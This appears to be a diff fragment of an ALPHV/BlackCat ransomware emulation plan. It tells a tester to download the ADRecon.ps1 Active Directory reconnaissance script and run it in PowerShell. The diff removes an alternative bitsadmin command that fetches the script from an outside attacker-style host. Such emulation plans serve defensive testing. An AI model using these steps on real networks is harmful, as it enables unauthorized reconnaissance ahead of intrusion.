attackevals/ael/ManagedServices/alphv_blackcat/Emulation_Plan/ALPHV_BlackCat_Scenario.md

     https://github.com/sense-of-security/ADRecon/blob/11881a24e9c8b207f31b56846809ce1fb189bcc9/ADRecon.ps1
     ```
     * Click the download button to "Download raw file" to the Downloads folder
-    * :heavy_exclamation_mark: If OVR testing, you will not have internet access to browse to GitHub.
-Instead:
-        * Open a non-elevated PowerShell and execute:
-            ```
-            bitsadmin /transfer ovr /download http://the-inator.com/digirevenge/ADRecon.ps1 C:\Users\zorimoto\Downloads\ADRecon.ps1
-            ```

 * Open a non-elevated PowerShell and execute ADRecon.ps1:
   ```